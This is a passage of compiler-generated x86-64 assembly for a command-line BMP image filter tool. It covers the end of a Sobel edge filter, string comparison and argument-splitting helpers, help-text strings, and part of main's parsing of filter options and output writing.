je .L84 mov rdi, QWORD PTR .LC9[rip] mov r9d, DWORD PTR -244[rbp] mov r10d, DWORD PTR -252[rbp] mov ecx, DWORD PTR -248[rbp] mov edx, DWORD PTR -276[rbp] mov esi, DWORD PTR -264[rbp] mov rax, QWORD PTR -272[rbp] push 3 lea r8, -160[rbp] push r8 movq xmm0, rdi mov r8d, r10d mov rdi, rax call use_mask add rsp, 16 movq rax, xmm0 movq xmm0, QWORD PTR .LC12[rip] movq xmm2, rax andpd xmm2, xmm0 movapd xmm0, xmm2 movsd QWORD PTR -224[rbp], xmm0 .L84: cmp BYTE PTR -260[rbp], 120 je .L85 mov rdi, QWORD PTR .LC9[rip] mov r9d, DWORD PTR -244[rbp] mov r10d, DWORD PTR -252[rbp] mov ecx, DWORD PTR -248[rbp] mov edx, DWORD PTR -276[rbp] mov esi, DWORD PTR -264[rbp] mov rax, QWORD PTR -272[rbp] push 3 lea r8, -80[rbp] push r8 movq xmm0, rdi mov r8d, r10d mov rdi, rax call use_mask add rsp, 16 movq rax, xmm0 movq xmm0, QWORD PTR .LC12[rip] movq xmm3, rax andpd xmm3, xmm0 movapd xmm0, xmm3 movsd QWORD PTR -216[rbp], xmm0 .L85: cmp BYTE PTR -260[rbp], 120 jne .L86 mov eax, DWORD PTR -244[rbp] cdqe movsd xmm0, QWORD PTR -192[rbp+rax*8] mulsd xmm0, QWORD PTR -224[rbp] movsd xmm1, QWORD PTR -208[rbp] addsd xmm0, xmm1 movsd QWORD PTR -208[rbp], xmm0 jmp .L83 .L86: cmp BYTE PTR -260[rbp], 121 jne .L87 mov eax, DWORD PTR -244[rbp] cdqe movsd xmm0, QWORD PTR -192[rbp+rax*8] mulsd xmm0, QWORD PTR -216[rbp] movsd xmm1, QWORD PTR -208[rbp] addsd xmm0, xmm1 movsd QWORD PTR -208[rbp], xmm0 jmp .L83 .L87: movsd xmm0, QWORD PTR -224[rbp] movapd xmm1, xmm0 mulsd xmm1, xmm0 movsd xmm0, QWORD PTR -216[rbp] mulsd xmm0, xmm0 addsd xmm1, xmm0 movq rax, xmm1 movq xmm0, rax call sqrt@PLT mov eax, DWORD PTR -244[rbp] cdqe movsd xmm1, QWORD PTR -192[rbp+rax*8] mulsd xmm0, xmm1 movsd xmm1, QWORD PTR -208[rbp] addsd xmm0, xmm1 movsd QWORD PTR -208[rbp], xmm0 .L83: add DWORD PTR -244[rbp], 1 .L82: cmp DWORD PTR -244[rbp], 2 jle .L88 movsd xmm0, QWORD PTR -208[rbp] comisd xmm0, QWORD PTR -288[rbp] jbe .L104 movsd xmm0, QWORD PTR .LC13[rip] movsd QWORD PTR -208[rbp], xmm0 jmp .L91 .L104: pxor xmm0, xmm0 movsd QWORD PTR -208[rbp], xmm0 .L91: mov DWORD PTR -240[rbp], 0 jmp .L92 .L93: mov eax, DWORD PTR -252[rbp] imul eax, DWORD PTR -264[rbp] mov edx, eax mov eax, DWORD PTR -248[rbp] add eax, edx mov edx, eax mov rax, rdx add rax, rax add rdx, rax mov rax, QWORD PTR -200[rbp] add rdx, rax cvttsd2si eax, QWORD PTR -208[rbp] mov ecx, eax mov eax, DWORD PTR -240[rbp] cdqe mov BYTE PTR [rdx+rax], cl add DWORD PTR -240[rbp], 1 .L92: cmp DWORD PTR -240[rbp], 2 jle .L93 add DWORD PTR -248[rbp], 1 .L81: mov eax, DWORD PTR -248[rbp] cmp eax, DWORD PTR -264[rbp] jb .L94 add DWORD PTR -252[rbp], 1 .L80: mov eax, DWORD PTR -252[rbp] cmp eax, DWORD PTR -276[rbp] jb .L95 mov DWORD PTR -236[rbp], 0 jmp .L96 .L101: mov DWORD PTR -232[rbp], 0 jmp .L97 .L100: mov DWORD PTR -228[rbp], 0 jmp .L98 .L99: mov eax, DWORD PTR -236[rbp] imul eax, DWORD PTR -264[rbp] mov edx, eax mov eax, DWORD PTR -232[rbp] add eax, edx mov edx, eax mov rax, rdx add rax, rax add rdx, rax mov rax, QWORD PTR -200[rbp] lea rcx, [rdx+rax] mov rax, QWORD PTR -272[rbp] mov rsi, QWORD PTR [rax] mov eax, DWORD PTR -236[rbp] imul eax, DWORD PTR -264[rbp] mov edx, eax mov eax, DWORD PTR -232[rbp] add rdx, rax mov rax, rdx add rax, rax add rax, rdx lea rdx, [rsi+rax] mov eax, DWORD PTR -228[rbp] cdqe add rdx, rax mov eax, DWORD PTR -228[rbp] cdqe movzx eax, BYTE PTR [rcx+rax] mov BYTE PTR [rdx], al add DWORD PTR -228[rbp], 1 .L98: cmp DWORD PTR -228[rbp], 2 jle .L99 add DWORD PTR -232[rbp], 1 .L97: mov eax, DWORD PTR -232[rbp] cmp eax, DWORD PTR -264[rbp] jb .L100 add DWORD PTR -236[rbp], 1 .L96: mov eax, DWORD PTR -236[rbp] cmp eax, DWORD PTR -276[rbp] jb .L101 mov rax, QWORD PTR -200[rbp] mov rdi, rax call free@PLT nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L102 call __stack_chk_fail@PLT .L102: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE14: .size sobel_xy, .-sobel_xy .globl compare .type compare, @function compare: .LFB15: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -4[rbp], 0 jmp .L106 .L110: mov eax, DWORD PTR -4[rbp] movsx rdx, eax mov rax, QWORD PTR -24[rbp] add rax, rdx movzx edx, BYTE PTR [rax] mov eax, DWORD PTR -4[rbp] movsx rcx, eax mov rax, QWORD PTR -32[rbp] add rax, rcx movzx eax, BYTE PTR [rax] cmp dl, al je .L107 mov eax, 0 jmp .L108 .L107: add DWORD PTR -4[rbp], 1 .L106: mov eax, DWORD PTR -4[rbp] movsx rdx, eax mov rax, QWORD PTR -24[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al je .L109 mov eax, DWORD PTR -4[rbp] movsx rdx, eax mov rax, QWORD PTR -32[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al jne .L110 .L109: mov eax, DWORD PTR -4[rbp] movsx rdx, eax mov rax, QWORD PTR -24[rbp] add rax, rdx movzx edx, BYTE PTR [rax] mov eax, DWORD PTR -4[rbp] movsx rcx, eax mov rax, QWORD PTR -32[rbp] add rax, rcx movzx eax, BYTE PTR [rax] cmp dl, al je .L111 mov eax, 0 jmp .L108 .L111: mov eax, 1 .L108: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE15: .size compare, .-compare .globl strgs .type strgs, @function strgs: .LFB16: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -40[rbp], rdi mov QWORD PTR -48[rbp], rsi mov rax, QWORD PTR -40[rbp] mov rax, QWORD PTR [rax] mov QWORD PTR -8[rbp], rax mov edi, 8 call malloc@PLT mov QWORD PTR -16[rbp], rax mov DWORD PTR -24[rbp], 0 mov DWORD PTR -20[rbp], 0 jmp .L113 .L127: mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 32 je .L114 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 9 je .L114 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 34 jne .L115 add DWORD PTR -20[rbp], 1 add DWORD PTR -24[rbp], 1 mov eax, DWORD PTR -24[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -16[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -16[rbp], rax mov eax, DWORD PTR -20[rbp] movsx rcx, eax mov eax, DWORD PTR -24[rbp] cdqe sal rax, 3 lea rdx, -8[rax] mov rax, QWORD PTR -16[rbp] add rax, rdx mov rdx, QWORD PTR -8[rbp] add rdx, rcx mov QWORD PTR [rax], rdx jmp .L116 .L118: add DWORD PTR -20[rbp], 1 .L116: mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 34 je .L117 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al je .L117 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 10 jne .L118 .L117: mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al je .L119 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 10 jne .L120 .L119: mov rax, QWORD PTR -48[rbp] mov DWORD PTR [rax], 0 mov rax, QWORD PTR -16[rbp] mov rdi, rax call free@PLT mov eax, 0 jmp .L121 .L120: mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx mov BYTE PTR [rax], 0 add DWORD PTR -20[rbp], 1 jmp .L113 .L115: add DWORD PTR -24[rbp], 1 mov eax, DWORD PTR -24[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -16[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -16[rbp], rax mov eax, DWORD PTR -20[rbp] movsx rcx, eax mov eax, DWORD PTR -24[rbp] cdqe sal rax, 3 lea rdx, -8[rax] mov rax, QWORD PTR -16[rbp] add rax, rdx mov rdx, QWORD PTR -8[rbp] add rdx, rcx mov QWORD PTR [rax], rdx jmp .L123 .L125: add DWORD PTR -20[rbp], 1 .L123: mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al je .L124 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 10 je .L124 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 32 je .L124 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 9 jne .L125 .L124: mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al je .L113 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx mov BYTE PTR [rax], 0 add DWORD PTR -20[rbp], 1 jmp .L113 .L114: add DWORD PTR -20[rbp], 1 .L113: mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] test al, al je .L126 mov eax, DWORD PTR -20[rbp] movsx rdx, eax mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 10 jne .L127 .L126: mov rax, QWORD PTR -48[rbp] mov edx, DWORD PTR -24[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -16[rbp] .L121: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE16: .size strgs, .-strgs .section .rodata .align 8 .LC16: .string "\n\tthis program allows you to use certain filters for bmp-24 and bmp-32 images" .align 8 .LC17: .string "\tinput format: <input file name> <filter with modificators> <output file name>" .LC18: .string "\tenter <help> for details" .LC19: .string "\tenter <exit> for finish\n" .LC20: .string "My_inst > " .LC21: .string "help" .LC22: .string "\n\tfilters supported:\n" .LC23: .string "\t<median>" .LC24: .string "\t\t/sz - matrix size\n" .LC25: .string "\t<gaussian>" .LC26: .string "\t\t/sz - matrix size" .LC27: .string "\t\t/sg - sigma\n" .LC28: .string "\t<sobel> <sobel_x> <sobel_y>" .align 8 .LC29: .string "\t\t/th - threshold, pixels in shades of gray from (255 / th) is white, the rest are black" .LC30: .string "\n\t<shade>" .align 8 .LC31: .string "\n\tyou can use modificators like <gaussian /sz = 5>" .align 8 .LC32: .string "\n\twithout modifiers standard values will be taken:" .align 8 .LC33: .string "\t\tsz = 3\n\t\tsg = 0.6\n\t\tth = 2.0\n" .LC34: .string "exit" .LC35: .string "invalid input" .LC36: .string "rb" .LC37: .string "can't open file '%s'\n" .LC38: .string "median" .LC39: .string "gaussian" .LC40: .string "sobel" .LC41: .string "sobel_x" .LC42: .string "sobel_y" .LC43: .string "shade" .LC44: .string "invalid filter input" .LC45: .string "modificator invalid input" .LC46: .string "wb" .LC47: .string "'%s' reading error\n" .text .globl main .type main, @function main: .LFB17: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 152 .cfi_offset 3, -24 mov DWORD PTR -148[rbp], edi mov QWORD PTR -160[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -24[rbp], rax xor eax, eax mov BYTE PTR -138[rbp], 0 .L207: mov DWORD PTR -124[rbp], 3 movsd xmm0, QWORD PTR .LC14[rip] movsd QWORD PTR -48[rbp], xmm0 movsd xmm0, QWORD PTR .LC15[rip] movsd QWORD PTR -40[rbp], xmm0 mov QWORD PTR -56[rbp], 0 cmp BYTE PTR -138[rbp], 0 je .L129 mov rax, QWORD PTR -160[rbp] mov rdi, rax call free@PLT mov rax, QWORD PTR -56[rbp] mov rdi, rax call free@PLT .L129: mov edi, 3 call malloc@PLT mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -56[rbp] mov BYTE PTR [rax], 97 mov rax, QWORD PTR -56[rbp] add rax, 1 mov BYTE PTR [rax], 32 mov eax, DWORD PTR -148[rbp] cmp eax, 3 jle .L130 cmp BYTE PTR -138[rbp], 0 je .L131 .L130: mov eax, DWORD PTR -148[rbp] cmp eax, 1 je .L132 cmp BYTE PTR -138[rbp], 0 je .L133 .L132: cmp BYTE PTR -138[rbp], 0 jne .L134 lea rdi, .LC16[rip] call puts@PLT lea rdi, .LC17[rip] call puts@PLT lea rdi, .LC18[rip] call puts@PLT lea rdi, .LC19[rip] call puts@PLT mov BYTE PTR -138[rbp], 1 .L134: lea rdi, .LC20[rip] mov eax, 0 call printf@PLT mov DWORD PTR -120[rbp], 2 .L137: call getchar@PLT mov edx, eax mov rcx, QWORD PTR -56[rbp] mov eax, DWORD PTR -120[rbp] cdqe add rax, rcx mov BYTE PTR [rax], dl mov rdx, QWORD PTR -56[rbp] mov eax, DWORD PTR -120[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 10 jne .L135 mov rdx, QWORD PTR -56[rbp] mov eax, DWORD PTR -120[rbp] cdqe add rax, rdx mov BYTE PTR [rax], 0 nop lea rdx, -148[rbp] lea rax, -56[rbp] mov rsi, rdx mov rdi, rax call strgs mov QWORD PTR -160[rbp], rax jmp .L133 .L135: mov eax, DWORD PTR -120[rbp] add eax, 2 movsx rdx, eax mov rax, QWORD PTR -56[rbp] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -56[rbp], rax add DWORD PTR -120[rbp], 1 jmp .L137 .L133: mov eax, DWORD PTR -148[rbp] cmp eax, 2 jne .L138 mov rax, QWORD PTR -160[rbp] add rax, 8 mov rax, QWORD PTR [rax] lea rsi, .LC21[rip] mov rdi, rax call compare test al, al je .L139 lea rdi, .LC22[rip] call puts@PLT lea rdi, .LC23[rip] call puts@PLT lea rdi, .LC24[rip] call puts@PLT lea rdi, .LC25[rip] call puts@PLT lea rdi, .LC26[rip] call puts@PLT lea rdi, .LC27[rip] call puts@PLT lea rdi, .LC28[rip] call puts@PLT lea rdi, .LC29[rip] call puts@PLT lea rdi, .LC30[rip] call puts@PLT lea rdi, .LC31[rip] call puts@PLT lea rdi, .LC32[rip] call puts@PLT lea rdi, .LC33[rip] call puts@PLT cmp BYTE PTR -138[rbp], 0 jne .L209 mov eax, 0 jmp .L206 .L139: mov rax, QWORD PTR -160[rbp] add rax, 8 mov rax, QWORD PTR [rax] lea rsi, .LC34[rip] mov rdi, rax call compare test al, al je .L143 mov eax, 0 jmp .L206 .L143: cmp BYTE PTR -138[rbp], 0 je .L144 lea rdi, .LC35[rip] call puts@PLT jmp .L205 .L144: mov eax, -1 jmp .L206 .L138: mov eax, DWORD PTR -148[rbp] cmp eax, 1 jne .L145 cmp BYTE PTR -138[rbp], 0 jne .L210 .L145: mov eax, DWORD PTR -148[rbp] cmp eax, 3 jg .L131 cmp BYTE PTR -138[rbp], 0 je .L146 lea rdi, .LC35[rip] call puts@PLT jmp .L205 .L146: mov eax, -1 jmp .L206 .L131: mov rax, QWORD PTR -160[rbp] add rax, 8 mov rcx, QWORD PTR [rax] lea rax, -88[rbp] lea rdx, .LC36[rip] mov rsi, rcx mov rdi, rax mov eax, 0 call fopen_s@PLT test eax, eax je .L147 mov rax, QWORD PTR -160[rbp] add rax, 8 mov rax, QWORD PTR [rax] mov rsi, rax lea rdi, .LC37[rip] mov eax, 0 call printf@PLT cmp BYTE PTR -138[rbp], 0 jne .L211 mov eax, -1 jmp .L206 .L147: mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC38[rip] mov rdi, rax call compare test al, al jne .L149 mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC39[rip] mov rdi, rax call compare test al, al jne .L149 mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC40[rip] mov rdi, rax call compare test al, al jne .L149 mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC41[rip] mov rdi, rax call compare test al, al jne .L149 mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC42[rip] mov rdi, rax call compare test al, al jne .L149 mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC43[rip] mov rdi, rax call compare test al, al jne .L149 lea rdi, .LC44[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L212 mov eax, -1 jmp .L206 .L149: mov DWORD PTR -116[rbp], 3 mov BYTE PTR -137[rbp], 0 jmp .L151 .L179: mov eax, DWORD PTR -116[rbp] cdqe add rax, 1 lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] cmp al, 61 je .L152 lea rdi, .LC45[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L153 mov eax, -1 jmp .L206 .L153: mov BYTE PTR -137[rbp], 1 jmp .L178 .L152: mov DWORD PTR -112[rbp], 0 jmp .L156 .L160: mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -112[rbp] cdqe add rax, 1 add rax, rdx movzx edx, BYTE PTR [rax] mov eax, DWORD PTR -112[rbp] cdqe mov BYTE PTR -26[rbp+rax], dl mov eax, DWORD PTR -112[rbp] cdqe movzx eax, BYTE PTR -26[rbp+rax] test al, al jne .L157 lea rdi, .LC45[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L158 mov eax, -1 jmp .L206 .L158: mov BYTE PTR -137[rbp], 1 jmp .L159 .L157: add DWORD PTR -112[rbp], 1 .L156: cmp DWORD PTR -112[rbp], 1 jle .L160 .L159: cmp BYTE PTR -137[rbp], 0 jne .L213 mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rax, QWORD PTR [rax] add rax, 3 movzx eax, BYTE PTR [rax] test al, al je .L162 lea rdi, .LC45[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L163 mov eax, -1 jmp .L206 .L163: mov BYTE PTR -137[rbp], 1 jmp .L178 .L162: add DWORD PTR -116[rbp], 2 mov DWORD PTR -108[rbp], 0 jmp .L164 .L169: mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -108[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 47 jle .L165 mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -108[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 57 jle .L166 .L165: mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -108[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] cmp al, 46 je .L166 lea rdi, .LC45[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L167 mov eax, -1 jmp .L206 .L167: mov BYTE PTR -137[rbp], 1 jmp .L168 .L166: add DWORD PTR -108[rbp], 1 .L164: mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -108[rbp] cdqe add rax, rdx movzx eax, BYTE PTR [rax] test al, al jne .L169 .L168: cmp BYTE PTR -137[rbp], 0 jne .L214 movzx eax, BYTE PTR -26[rbp] cmp al, 115 jne .L171 movzx eax, BYTE PTR -25[rbp] cmp al, 122 jne .L172 mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rax, QWORD PTR [rax] mov rdi, rax call atoi@PLT lea ebx, -1[rax] mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rax, QWORD PTR [rax] mov rdi, rax call atoi@PLT cdq shr edx, 31 add eax, edx and eax, 1 sub eax, edx add eax, ebx mov DWORD PTR -124[rbp], eax jmp .L173 .L172: movzx eax, BYTE PTR -25[rbp] cmp al, 103 jne .L174 mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rax, QWORD PTR [rax] mov rdi, rax call atof@PLT movq rax, xmm0 mov QWORD PTR -48[rbp], rax jmp .L173 .L174: lea rdi, .LC45[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L175 mov eax, -1 jmp .L206 .L175: mov BYTE PTR -137[rbp], 1 jmp .L178 .L171: movzx eax, BYTE PTR -26[rbp] cmp al, 116 jne .L176 movzx eax, BYTE PTR -25[rbp] cmp al, 104 jne .L176 mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rax, QWORD PTR [rax] mov rdi, rax call atof@PLT movapd xmm1, xmm0 movsd xmm0, QWORD PTR .LC13[rip] divsd xmm0, xmm1 movsd QWORD PTR -40[rbp], xmm0 jmp .L173 .L176: lea rdi, .LC45[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L177 mov eax, -1 jmp .L206 .L177: mov BYTE PTR -137[rbp], 1 jmp .L178 .L173: add DWORD PTR -116[rbp], 1 .L151: mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rax, QWORD PTR [rax] movzx eax, BYTE PTR [rax] cmp al, 47 jne .L178 mov eax, DWORD PTR -116[rbp] lea edx, 3[rax] mov eax, DWORD PTR -148[rbp] cmp edx, eax jl .L179 jmp .L178 .L213: nop jmp .L178 .L214: nop .L178: cmp BYTE PTR -137[rbp], 0 jne .L215 mov eax, DWORD PTR -116[rbp] cdqe lea rdx, 0[0+rax*8] mov rax, QWORD PTR -160[rbp] add rax, rdx mov rcx, QWORD PTR [rax] lea rax, -80[rbp] lea rdx, .LC46[rip] mov rsi, rcx mov rdi, rax mov eax, 0 call fopen_s@PLT test eax, eax je .L181 lea rdi, .LC35[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L216 mov eax, -1 jmp .L206 .L181: mov eax, DWORD PTR -116[rbp] lea edx, 1[rax] mov eax, DWORD PTR -148[rbp] cmp edx, eax jge .L183 lea rdi, .LC35[rip] call puts@PLT mov rax, QWORD PTR -88[rbp] mov rdi, rax call fclose@PLT mov rax, QWORD PTR -80[rbp] mov rdi, rax call fclose@PLT cmp BYTE PTR -138[rbp], 0 jne .L217 mov eax, -1 jmp .L206 .L183: mov rsi, QWORD PTR -80[rbp] mov rax, QWORD PTR -88[rbp] lea r8, -64[rbp] lea rdi, -72[rbp] lea rcx, -132[rbp] lea rdx, -136[rbp] mov r9, r8 mov r8, rdi mov rdi, rax call read_and_write_bmp test eax, eax jne .L185 mov rax, QWORD PTR -64[rbp] test rax, rax je .L186 mov DWORD PTR -128[rbp], 32 jmp .L187 .L186: mov DWORD PTR -128[rbp], 24 .L187: mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC38[rip] mov rdi, rax call compare test al, al je .L188 mov ecx, DWORD PTR -132[rbp] mov edx, DWORD PTR -136[rbp] mov rsi, QWORD PTR -48[rbp] mov edi, DWORD PTR -124[rbp] lea rax, -72[rbp] movq xmm0, rsi mov r8d, edi mov rsi, rax mov edi, 109 call megas jmp .L189 .L188: mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC39[rip] mov rdi, rax call compare test al, al je .L190 mov ecx, DWORD PTR -132[rbp] mov edx, DWORD PTR -136[rbp] mov rsi, QWORD PTR -48[rbp] mov edi, DWORD PTR -124[rbp] lea rax, -72[rbp] movq xmm0, rsi mov r8d, edi mov rsi, rax mov edi, 103 call megas jmp .L189 .L190: mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC40[rip] mov rdi, rax call compare test al, al je .L191 mov ecx, DWORD PTR -132[rbp] mov edx, DWORD PTR -136[rbp] mov rsi, QWORD PTR -40[rbp] lea rax, -72[rbp] movq xmm0, rsi mov rsi, rax mov edi, 0 call sobel_xy jmp .L189 .L191: mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC41[rip] mov rdi, rax call compare test al, al je .L192 mov ecx, DWORD PTR -132[rbp] mov edx, DWORD PTR -136[rbp] mov rsi, QWORD PTR -40[rbp] lea rax, -72[rbp] movq xmm0, rsi mov rsi, rax mov edi, 120 call sobel_xy jmp .L189 .L192: mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC42[rip] mov rdi, rax call compare test al, al je .L193 mov ecx, DWORD PTR -132[rbp] mov edx, DWORD PTR -136[rbp] mov rsi, QWORD PTR -40[rbp] lea rax, -72[rbp] movq xmm0, rsi mov rsi, rax mov edi, 121 call sobel_xy jmp .L189 .L193: mov rax, QWORD PTR -160[rbp] add rax, 16 mov rax, QWORD PTR [rax] lea rsi, .LC43[rip] mov rdi, rax call compare test al, al je .L189 mov edx, DWORD PTR -132[rbp] mov ecx, DWORD PTR -136[rbp] lea rax, -72[rbp] mov esi, ecx mov rdi, rax call shade .L189: mov DWORD PTR -104[rbp], 0 jmp .L194 .L202: mov DWORD PTR -100[rbp], 0 jmp .L195 .L199: mov DWORD PTR -96[rbp], 2 jmp .L196 .L197: mov rdx, QWORD PTR -72[rbp] mov eax, DWORD PTR -136[rbp] imul eax, DWORD PTR -104[rbp] mov ecx, eax mov eax, DWORD PTR -100[rbp] add eax, ecx mov ecx, eax mov rax, rcx add rax, rax add rax, rcx add rdx, rax mov eax, DWORD PTR -96[rbp] cdqe movzx eax, BYTE PTR [rdx+rax] movzx eax, al mov rdx, QWORD PTR -80[rbp] mov rsi, rdx mov edi, eax call fputc@PLT sub DWORD PTR -96[rbp], 1 .L196: cmp DWORD PTR -96[rbp], 0 jns .L197 mov rax, QWORD PTR -64[rbp] test rax, rax je .L198 mov rax, QWORD PTR -80[rbp] mov rsi, rax mov edi, 0 call fputc@PLT .L198: add DWORD PTR -100[rbp], 1 .L195: mov eax, DWORD PTR -136[rbp] cmp DWORD PTR -100[rbp], eax jb .L199 mov DWORD PTR -92[rbp], 0 jmp .L200 .L201: mov rax, QWORD PTR -80[rbp] mov rsi, rax mov edi, 0 call fputc@PLT add DWORD PTR -92[rbp], 1 .L200: mov eax, DWORD PTR -128[rbp] shr eax, 3 mov edx, eax mov eax, DWORD PTR -136[rbp] imul eax, edx neg 